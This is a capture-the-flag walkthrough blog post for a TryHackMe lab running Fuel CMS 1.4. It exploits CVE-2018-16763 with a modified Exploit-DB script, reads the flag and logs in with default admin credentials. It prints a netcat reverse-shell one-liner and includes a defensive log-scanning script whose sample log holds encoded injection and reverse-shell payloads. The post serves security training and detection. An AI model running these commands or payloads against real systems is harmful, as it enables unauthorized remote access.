Jasper Alblas
Let’s look at the Vulnerability Capstone room on THM, the capstone of the Vulnerability Research module, in which we apply the skills learnt in that module.
I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I retain the knowledge gained from these challenges on HTB and THM.
Join me in learning cyber security. I will try to explain concepts as I go, to differentiate these from other walkthroughs.
Box URL: https://tryhackme.com/r/room/vulnerabilitycapstone
Summarize the skills learnt in this module by completing this capstone room for the “Vulnerability Research” module.
Acme Support Incorporated has recently set up a new blog. Their developer team have asked for a security audit to be performed before they create and publish articles to the public.
It is your task to perform a security audit on the blog; looking for and abusing any vulnerabilities that you find.
Answer: No answer needed
Deploy the vulnerable machine attached to this by pressing the green “Start Machine” button. It is recommended that you use the TryHackMe AttackBox to complete this room.
Allow five minutes to pass before attempting to attack the vulnerable machine MACHINE_IP
Let’s get going. Start up your AttackBox or if you prefer connect to the target machine by using OpenVPN, using the following command:
sudo openvpn <file_name>.ovpn
To find out what we are looking at, start by running a simple nmap scan:
nmap <target ip>
This shows us an SSH service and a web server:
Considering the type of challenge, we should probably take a look at the webserver. Open the page in your favorite browser.
Well this is interesting! It seems to be a Content Management System, and the name is very visible.
Answer: Fuel CMS
This question is also very easy to answer now. The CMS is not properly set up yet, so it shows us the version number straight away.
Answer: 1.4
There are a lot of different ways to search for exploits. We could use searchsploit in the terminal.
searchsploit fuel cms 1.4
This gives us a bunch of exploits:
But I am not a big fan of this, as I always end up googling anyway. So let’s just search on Google. We quickly find the following CVE: CVE-2018-16763.
This is the one TryHackMe expects.
Answer: CVE-2018-16763
It’s time to exploit this vulnerability, by running the exploit.
Exploit-db has a useful page, including a script, on this vulnerability here:
Click the download button found on the page:
This will download the script to our machine.
Let’s try and run the script:
python3 50477.py
It gives us a message about needing a url. That makes sense:
Run it again, now followed by the target machine ip.
python3 50477.py -u <target ip>
This warned me about having to enter a valid URL. Let’s try again with http:// before the ip address:
python3 50477.py -u http://<target ip>
This worked:
We can now enter commands, which means we might have accomplished Remote Code Execution!
But darn it, no matter which command we enter we always get “system” back:
Something seems wrong with the exploit. I took a look with Burp Suite, intercepted the GET requests from the script and saw that the command output is indeed there, just not in the HTML tag read by the text.split() call in the exploit script:
It was actually pretty close to the other HTML tag that contains system, so I decided to change the printing of the variable output[0] to output[1]. This means that the second array element that gets returned by text.split() now gets printed.
In essence, we now print the second (remember array indexes start at 0) div element with the correct style, instead of the first.
Save the script, and run again.
It worked:
In this theoretical CTF assignment we can continue by simply reading the flag, which is found in /home/ubuntu (the question says so).
So as a command you can simply enter:
ls /home/ubuntu
The flag is right there. Enter the following:
cat /home/ubuntu/flag.txt
There we go:
Answer: THM{ACKME_BLOG_HACKED}
That’s it 🙂
For extra points we could even get a reverse shell.
Start a listener on your attacker machine with:
nc -lvnp 1234
Then enter the following command into the exploit:
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <listener port>>/tmp/f
This gives us a reverse shell:
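From the defender’s side, the exploit requests above and the reverse-shell one-liner both leave a clear trace in the web server’s access log. The following detector is an added example, not part of the room or the exploit script; it assumes the combined log format, that the exploit hits the Fuel CMS page-selection endpoint (/fuel/pages/select) through its filter query parameter (taken from the public exploit, verify against your own traffic), and it runs over constructed sample log lines.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Endpoint abused by CVE-2018-16763 (assumption based on the public exploit script).
VULN_PATH = "/fuel/pages/select"
# PHP call patterns that have no business in a legitimate page filter value.
PHP_CALL = re.compile(r"(pi|print|system|eval|passthru|\$\w+)\s*\(", re.I)
# Fragments of the reverse-shell one-liner from the walkthrough.
SHELL_TOKENS = ("mknod", "/bin/sh", "|nc ", "2>&1", "/tmp/f")

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for benign or unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path.rstrip("/") != VULN_PATH:
        return None
    # parse_qs decodes once; unquote again so double-encoded payloads are not missed.
    filt = unquote(parse_qs(url.query).get("filter", [""])[0])
    if not PHP_CALL.search(filt):
        return None
    shell_hits = [t for t in SHELL_TOKENS if t in filt]
    return {
        "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "filter": filt,
        "severity": "high" if shell_hits else "medium",
        "reason": ("reverse-shell tokens: " + ", ".join(shell_hits)) if shell_hits else "PHP code in filter",
    }

def scan(log_text):
    """Run analyze_line over every line and collect the findings in log order."""
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]

# Constructed sample log: a normal visit, one command injection, the reverse shell, a benign filter.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27system%27%29%29%2B%24a%28%27ls%20%2Fhome%2Fubuntu%27%29%2B%27 HTTP/1.1" 200 812 "-" "python-requests/2.25.1"
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27system%27%29%29%2B%24a%28%27rm%20-f%20%2Ftmp%2Ff%3Bmknod%20%2Ftmp%2Ff%20p%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.0.0.9%201234%3E%2Ftmp%2Ff%27%29%2B%27 HTTP/1.1" 200 812 "-" "python-requests/2.25.1"
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 430 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["ts"], f["reason"])
```

The same check is easy to lift into a SIEM rule; the high-severity branch (PHP injection plus shell plumbing in one request) is the one worth paging on.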
The CMS has another vulnerability. Since the CMS is not properly set up we can log in with the default credentials, as mentioned here:
Follow the link and enter admin twice:
And we got in!
This probably allows for a lot of other possibilities 🙂
Congratulations, we did it once again! I hope you enjoyed this walkthrough on the Vulnerability Capstone room on TryHackMe.
I really liked this room and it made us repeat some of the skills we picked up during the Vulnerability module. See you next time.
You are welcome to comment on this article, and please share with friends!
I would be even more grateful if you support me by buying me a cup of coffee:
I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:
https://referral.hackthebox.com/mzwwXlg
Happy Hacking!